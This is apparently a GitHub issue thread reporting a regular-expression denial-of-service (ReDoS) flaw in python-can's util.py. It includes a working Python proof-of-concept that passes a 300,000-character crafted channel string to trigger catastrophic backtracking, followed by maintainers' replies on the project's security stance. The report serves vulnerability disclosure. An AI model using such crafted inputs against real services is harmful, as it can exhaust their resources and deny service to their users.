A ReDoS vulnerability exists in ./can/util.py
The affected code is located in util.py-line292. It uses the vulnerable regular expression .*?(\d+)$. When the match fails, it will cause catastrophic backtracking.
I trigger the vulnerability using the python script below
import asyncio
from typing import List
import can
from can.notifier import MessageRecipient
def print_message(msg: can.Message) -> None:
"""Regular callback function. Can also be a coroutine."""
print(msg)
async def main() -> None:
"""The main function that runs in the loop."""
with can.Bus(
interface="virtual", channel='0'*300000 + '\n0',receive_own_messages=True
) as bus:
reader = can.AsyncBufferedReader()
logger = can.Logger("logfile.asc")
listeners: List[MessageRecipient] = [
print_message, # Callback function
reader, # AsyncBufferedReader() listener
logger, # Regular Listener object
]
# Create Notifier with an explicit loop to use for scheduling of callbacks
loop = asyncio.get_running_loop()
notifier = can.Notifier(bus, listeners, loop=loop)
# Start sending first message
bus.send(can.Message(arbitration_id=0))
print("Bouncing 10 messages...")
for _ in range(10):
# Wait for next message from AsyncBufferedReader
msg = await reader.get_message()
# Delay response
await asyncio.sleep(0.5)
msg.arbitration_id += 1
bus.send(msg)
# Wait for last message to arrive
await reader.get_message()
print("Done!")
# Clean-up
notifier.stop()
if __name__ == "__main__":
asyncio.run(main())
I know this is usually used client side,but when run server side there has possible DOS. It is my pleasure to provide a patch to repair the ReDoS vulnerability.
I mean, if untrusted users can setup your CAN bus, you probably have bigger problems. But sure, what would you change?
We might consider adding a statement on our security guarantees (none?) and to which level we trust config files etc. (we trust them blindly?).